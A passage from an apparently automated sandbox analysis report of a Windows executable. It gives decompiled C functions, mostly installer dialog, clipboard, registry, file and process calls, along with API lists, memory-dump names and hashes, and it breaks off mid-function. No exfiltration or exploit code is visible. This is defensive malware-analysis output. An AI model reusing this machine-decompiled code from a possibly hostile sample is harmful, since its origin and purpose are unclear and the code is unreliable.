                                                                                                                                                                                                    • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                    • Part of subcall function 004059D1: CreateProcessW.KERNEL32 ref: 004059FA
                                                                                                                                                                                                    • Part of subcall function 004059D1: CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401F4D
                                                                                                                                                                                                    • Part of subcall function 00406873: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406884
                                                                                                                                                                                                    • Part of subcall function 00406873: GetExitCodeProcess.KERNEL32 ref: 004068A6
                                                                                                                                                                                                    • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$CloseProcesslstrlen$ChangeCodeCreateExitFindHandleNotificationObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1543427666-0
                                                                                                                                                                                                  • Opcode ID: 529ccf1531d3671747b453854c2b9f6451904b19556d532ab9f52959be17af81
                                                                                                                                                                                                  • Instruction ID: acd8761c06f5a0ec48b5b4c4c323a9df4587fdbfc486ef5c68e798776a33b5ab
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 529ccf1531d3671747b453854c2b9f6451904b19556d532ab9f52959be17af81
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37F09632906011D7CB20FBA189485DE77A49F40318B24417BF501B21D1CB7C4D419A6E
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00406255 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E00406255(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E004061DA(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                                                                                                                                  0x0040625f
                                                                                                                                                                                                  0x00406266
                                                                                                                                                                                                  0x00406279
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406279
                                                                                                                                                                                                  0x0040626a
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0043E708,?,?,004062E3,0043E708,00000000,?,?,ExecToStack,?), ref: 00406279
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                  • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 0040345D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E0040345D(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                                                                                                  0x0040346b
                                                                                                                                                                                                  0x00403471

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                                                                  • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                  • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C1F(_t7);
				 *((intOrPtr*)(_t13 - 0x4c)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                                                                                                                                                                  0x004014d7
                                                                                                                                                                                                  0x004014d8
                                                                                                                                                                                                  0x004014e1
                                                                                                                                                                                                  0x004014e4
                                                                                                                                                                                                  0x004014e8
                                                                                                                                                                                                  0x004014e8
                                                                                                                                                                                                  0x004014ea
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00402ad4

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                  • Opcode ID: 7d34772e4df8165faff662bafa2a5a1c28cb08ab8f088d5ba6396c18c772b027
                                                                                                                                                                                                  • Instruction ID: e0a3bfc36f3dfc6bb6130a16f4dffa22c10a56fe276d2b1e6be5e96d60bf041c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d34772e4df8165faff662bafa2a5a1c28cb08ab8f088d5ba6396c18c772b027
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2D05E73E142408BD710DBB8BA8945E73A8E780319320883BE106F1091E97888824A2C
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                  Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                                                                  			E0040558F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x468224;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405523, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040640A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x446728;
								_v44 = 0x8000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x46820c == _t156) {
							ShowWindow( *0x470248, 8);
							if( *0x4702ec == _t156) {
								E00405450( *((intOrPtr*)( *0x43e700 + 0x34)), _t156);
							}
							E00404338(_t171);
							goto L25;
						}
						 *0x43a6f8 = 2;
						E00404338(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004043C6(_a8, _a12, _a16);
						}
						ShowWindow( *0x468210, _t156);
						ShowWindow(_t169, 8);
						E00404394(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x470254;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x468210 = GetDlgItem(_a4, 0x403);
				 *0x468208 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x468224 = _t134;
				_v8 = _t134;
				E00404394( *0x468210);
				 *0x468214 = E00404CED(4);
				 *0x46822c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E0040435F(_a4);
				if(( *0x47025c & 0x00000003) != 0) {
					ShowWindow( *0x468210, _t156);
					if(( *0x47025c & 0x00000002) != 0) {
						 *0x468210 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404394( *0x468208);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x47025c & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                                                                                                                                                                  0x00405597
                                                                                                                                                                                                  0x0040559d
                                                                                                                                                                                                  0x004055a7
                                                                                                                                                                                                  0x004055aa
                                                                                                                                                                                                  0x00405740
                                                                                                                                                                                                  0x00405764
                                                                                                                                                                                                  0x00405764
                                                                                                                                                                                                  0x00405777
                                                                                                                                                                                                  0x00405795
                                                                                                                                                                                                  0x00405797
                                                                                                                                                                                                  0x0040579f
                                                                                                                                                                                                  0x004057f5
                                                                                                                                                                                                  0x004057f9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004057fb
                                                                                                                                                                                                  0x00405801
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040580b
                                                                                                                                                                                                  0x00405813
                                                                                                                                                                                                  0x00405816
                                                                                                                                                                                                  0x00405918
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405918
                                                                                                                                                                                                  0x00405825
                                                                                                                                                                                                  0x00405830
                                                                                                                                                                                                  0x00405839
                                                                                                                                                                                                  0x00405844
                                                                                                                                                                                                  0x00405847
                                                                                                                                                                                                  0x00405850
                                                                                                                                                                                                  0x00405856
                                                                                                                                                                                                  0x00405859
                                                                                                                                                                                                  0x00405859
                                                                                                                                                                                                  0x00405871
                                                                                                                                                                                                  0x0040587a
                                                                                                                                                                                                  0x0040587d
                                                                                                                                                                                                  0x00405884
                                                                                                                                                                                                  0x0040588b
                                                                                                                                                                                                  0x00405893
                                                                                                                                                                                                  0x00405893
                                                                                                                                                                                                  0x004058aa
                                                                                                                                                                                                  0x004058aa
                                                                                                                                                                                                  0x004058b1
                                                                                                                                                                                                  0x004058b7
                                                                                                                                                                                                  0x004058c3
                                                                                                                                                                                                  0x004058ca
                                                                                                                                                                                                  0x004058d3
                                                                                                                                                                                                  0x004058d5
                                                                                                                                                                                                  0x004058d8
                                                                                                                                                                                                  0x004058e7
                                                                                                                                                                                                  0x004058ea
                                                                                                                                                                                                  0x004058f0
                                                                                                                                                                                                  0x004058f1
                                                                                                                                                                                                  0x004058f7
                                                                                                                                                                                                  0x004058f8
                                                                                                                                                                                                  0x004058f9
                                                                                                                                                                                                  0x00405901
                                                                                                                                                                                                  0x0040590c
                                                                                                                                                                                                  0x00405912
                                                                                                                                                                                                  0x00405912
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405871
                                                                                                                                                                                                  0x004057a7
                                                                                                                                                                                                  0x004057d7
                                                                                                                                                                                                  0x004057df
                                                                                                                                                                                                  0x004057ea
                                                                                                                                                                                                  0x004057ea
                                                                                                                                                                                                  0x004057f0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004057f0
                                                                                                                                                                                                  0x004057ab
                                                                                                                                                                                                  0x004057b5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405779
                                                                                                                                                                                                  0x0040577f
                                                                                                                                                                                                  0x004057ba
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004057c3
                                                                                                                                                                                                  0x00405788
                                                                                                                                                                                                  0x0040578d
                                                                                                                                                                                                  0x00405790
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405790
                                                                                                                                                                                                  0x00405777
                                                                                                                                                                                                  0x004055b0
                                                                                                                                                                                                  0x004055b4
                                                                                                                                                                                                  0x004055bc
                                                                                                                                                                                                  0x004055c0
                                                                                                                                                                                                  0x004055c3
                                                                                                                                                                                                  0x004055c6
                                                                                                                                                                                                  0x004055c9
                                                                                                                                                                                                  0x004055cc
                                                                                                                                                                                                  0x004055cd
                                                                                                                                                                                                  0x004055ce
                                                                                                                                                                                                  0x004055e7
                                                                                                                                                                                                  0x004055ea
                                                                                                                                                                                                  0x004055f4
                                                                                                                                                                                                  0x00405603
                                                                                                                                                                                                  0x0040560b
                                                                                                                                                                                                  0x00405613
                                                                                                                                                                                                  0x00405618
                                                                                                                                                                                                  0x0040561b
                                                                                                                                                                                                  0x00405627
                                                                                                                                                                                                  0x00405630
                                                                                                                                                                                                  0x00405639
                                                                                                                                                                                                  0x0040565b
                                                                                                                                                                                                  0x00405661
                                                                                                                                                                                                  0x00405672
                                                                                                                                                                                                  0x00405677
                                                                                                                                                                                                  0x00405685
                                                                                                                                                                                                  0x00405693
                                                                                                                                                                                                  0x00405693
                                                                                                                                                                                                  0x00405698
                                                                                                                                                                                                  0x004056a6
                                                                                                                                                                                                  0x004056a6
                                                                                                                                                                                                  0x004056ab
                                                                                                                                                                                                  0x004056ae
                                                                                                                                                                                                  0x004056b3
                                                                                                                                                                                                  0x004056bf
                                                                                                                                                                                                  0x004056c8
                                                                                                                                                                                                  0x004056d5
                                                                                                                                                                                                  0x004056e4
                                                                                                                                                                                                  0x004056d7
                                                                                                                                                                                                  0x004056dc
                                                                                                                                                                                                  0x004056dc
                                                                                                                                                                                                  0x004056f0
                                                                                                                                                                                                  0x004056f0
                                                                                                                                                                                                  0x00405704
                                                                                                                                                                                                  0x0040570d
                                                                                                                                                                                                  0x00405716
                                                                                                                                                                                                  0x00405726
                                                                                                                                                                                                  0x00405732
                                                                                                                                                                                                  0x00405732
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 004055ED
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 004055FC
                                                                                                                                                                                                  • GetClientRect.USER32 ref: 00405639
                                                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 00405640
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 004056FD
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 0040560B
                                                                                                                                                                                                    • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 0040574F
                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 0040575D
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                                                                                                                  • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                                                                                                                  • AppendMenuW.USER32 ref: 00405830
                                                                                                                                                                                                  • GetWindowRect.USER32 ref: 00405850
                                                                                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 004058B7
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                                                                                                                  • GlobalLock.KERNEL32 ref: 004058CD
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                                                                                                                  • SetClipboardData.USER32 ref: 0040590C
                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00405912
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                  • String ID: (gD${
                                                                                                                                                                                                  • API String ID: 590372296-3503173740
                                                                                                                                                                                                  • Opcode ID: 9927c5c04afc45ce7243f23ce83da3be808d830e5e7dac2abc1f2713bef2e627
                                                                                                                                                                                                  • Instruction ID: c9c6b7b377eba0e4ba3b2f043119a7f49a951143ce35cdb84ba81c9eded025b4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9927c5c04afc45ce7243f23ce83da3be808d830e5e7dac2abc1f2713bef2e627
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9B16A71800608FFDB11AFA0DD89AAE7B79FB48314F10817AFA45B61A0DB744E51DF68
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                                                  			E00404DCC(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x470288;
				_t282 = 0;
				_v24 =  *0x470254 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x47025d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
